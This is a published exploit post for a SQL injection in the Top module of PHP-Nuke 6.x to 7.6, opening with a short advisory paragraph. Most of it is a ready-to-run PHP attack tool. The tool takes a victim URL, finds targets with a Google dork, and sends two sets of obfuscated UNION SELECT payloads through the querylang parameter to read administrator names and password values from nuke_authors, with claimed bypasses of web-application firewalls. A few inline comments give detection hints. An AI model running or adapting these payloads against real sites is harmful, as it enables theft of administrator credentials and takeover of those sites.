
PHP-Nuke Top Module SQL Injection

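The Top module in PHP-Nuke versions from 6.x up to, but not including, 7.6 suffers from a remote SQL injection vulnerability. The proof of concept below sends SQL in the `querylang` request parameter of `modules.php?name=Top` and reads the `aid` and `pwd` columns of the `nuke_authors` table, and it sends no session or credentials, so the exposure is of administrator account names and stored passwords to an unauthenticated remote client. Defenders can search web-server logs for requests to the Top module whose `querylang` value contains SQL keywords once URL-decoded and stripped of SQL comments, and should treat administrator credentials as disclosed if any are found.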

Packet Storm
# Exploit Title: PHP-Nuke ( SQL injection Top Module + protection Bypass )# Google Dork: intext: Powered by PHP-Nuke# Date: 2024-10-07# Exploit Author: Emiliano Febbi# Vendor Homepage: https://phpnuke.org/# Software Link: https://sourceforge.net/projects/phpnuke/files/phpnuke/# Version: 6.x < 7.6# Tested on: Windows 10[code] ->New concept of exploit writing, CMS protections are useless. ->Very fast usage.<?phpecho '<html><head><title>PHP-Nuke SQL injection / Bypass Protections</title></head><body><center><body bgcolor="black"><body link="yellow"><font color="white"><pre>new exploit concept#######################################################################This exploit is for Top Module of PHP-Nuke 6.x < 7.6                ##auto-bypass *illegal operation* , *mod security* , *NukeSentinel*   ##allowed http and https protocols. Code by Emiliano Febbi            #######################################################################</pre><form action="'.$SERVER[PHP_SELF].'" method="POST"><font color="red">~ insert victim site ~ </font>(*the folder must be specified)<br><input type="text" name="victim" value="http://www.site.com"><br><label for="dlt"><font color="white">++method++</font></label><select name="exploit_nuke" id="lang"><option value="one">#1</option><option value="two">#2</option></select><br><input type="submit" value="launch!"/><br></form></font></body></html>';if($_POST['victim']) {       $site = $_POST['victim'];    $j = $_POST['exploit_nuke'];        switch ($j) {                 /*#method1: SQL is sent in the querylang parameter of modules.php?name=Top, with keywords in mixed case and split by "#xyz" plus an encoded newline. Detection note: match on the URL-decoded, comment-stripped, case-folded querylang value in request logs and WAF rules rather than on the raw string.*/             case "one":             /*#Get info from victim site: fetches admin.php and modules.php?name=Top with file(); any fetch that does not return false is reported as present*/        if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";          else echo "<font color='yellow'>~missing Admin Login</font><br><br>";             if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";           else echo "<font color='yellow'>#Top Module not Active!</font><br>"; print 
'<font color="white">--------------------------------------<br></font>';             /*#Get user1: requests the aid column of nuke_authors (presumably the default table prefix) and reads the value back from the first Surveys link in the returned page*/             print "<font color='white'>#user1:<br><font color='lime'>";                 $content_user=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");     $comment_user=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user);    $comment_user=explode("</a>",$comment_user[1]);            var_dump(strip_tags($comment_user[0]));                                echo "</font><br>";             /*#Get pwd1: same request with the pwd column; if requests of this shape appear in logs, treat the stored administrator credentials as disclosed*/                    print "#password1:<br><font color='red'>";                 $content=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");                 $comment=explode('<a href="modules.php?name=Surveys&pollID=1">',$content);              $comment=explode("</a>",$comment[1]);                 var_dump(strip_tags($comment[0]));                                echo "</font><br>";                                    /*#Get user2: repeats the aid request and takes the second matching link instead of the first*/                      print "#user2:<br><font color='lime'>";                 $content_user2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,aid,1,1%20FROM%20nuke_authors--");     $comment_user2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content_user2);  $comment_user2=explode("</a>",$comment_user2[2]);           var_dump(strip_tags($comment_user2[0]));                                echo "</font><br>";             /*#Get pwd2: repeats the pwd request and takes the second matching link*/                        print "#password2:<br><font color='red'>"; $content2=file_get_contents("$site/modules.php?name=Top&querylang=%20WHERE%201=2+%23xyz%0AUnIOn%23xyz%0ASeLecT+1,pwd,1,1%20FROM%20nuke_authors--");               $comment2=explode('<a href="modules.php?name=Surveys&pollID=1">',$content2);           $comment2=explode("</a>",$comment2[2]);               
var_dump(strip_tags($comment2[0]));                               echo "</font><br>";                 break;/*###################################################################################################################################*/             case "two":                /*#method2: same four reads as method 1 with a different request shape (keywords separated by encoded CR LF, columns 0,aid,0,0 or 0,pwd,0,0, link marker pollID=0). Detection note: a rule keyed only to the method 1 string will not match this one.*/                /*#Get info from victim site: same two file() fetches as in method 1*/             if (false!==file("$site/admin.php")) echo "<a href='$site/admin.php'>~Admin Login Found!</a><br><br>";          else echo "<font color='yellow'>~missing Admin Login</font><br><br>";                  if (false!==file("$site/modules.php?name=Top")) echo "<font color='yellow'>#Top Module Active!</font><br>";           else echo "<font color='yellow'>#Top Module not Active!</font><br>"; print '<font color="white">--------------------------------------<br></font>';                /*#Get user1*/             print "<font color='white'>#user1:<br><font color='lime'>";                 $content_userj=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");     $comment_userj=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userj);    $comment_userj=explode("</a>",$comment_userj[1]);             var_dump(strip_tags($comment_userj[0]));                                  echo "</font><br>";             /*#Get pwd1*/                   print "#password1:<br><font color='red'>";                 $content_userp=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");     $comment_userp=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userp);    $comment_userp=explode("</a>",$comment_userp[1]);             var_dump(strip_tags($comment_userp[0]));                                  echo "</font><br>";                                    /*#Get user2*/             print "#user2:<br><font color='lime'>";             
$content_userz=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,aid,0,0+from+nuke_authors--");     $comment_userz=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userz);    $comment_userz=explode("</a>",$comment_userz[2]);             var_dump(strip_tags($comment_userz[0]));                                  echo "</font><br>";             /*#Get pwd2*/                      print "#password2:<br><font color='red'>"; $content_userq=file_get_contents("$site/modules.php?name=Top&querylang=+UnIOn%0D%0ASeleCt%0D%0A+0,pwd,0,0+from+nuke_authors--");     $comment_userq=explode('<a href="modules.php?name=Surveys&pollID=0">',$content_userq);    $comment_userq=explode("</a>",$comment_userq[2]);             var_dump(strip_tags($comment_userq[0]));                                  echo "</font><br>";                                               break;                                                   };;                                                   };;;?>[/code]
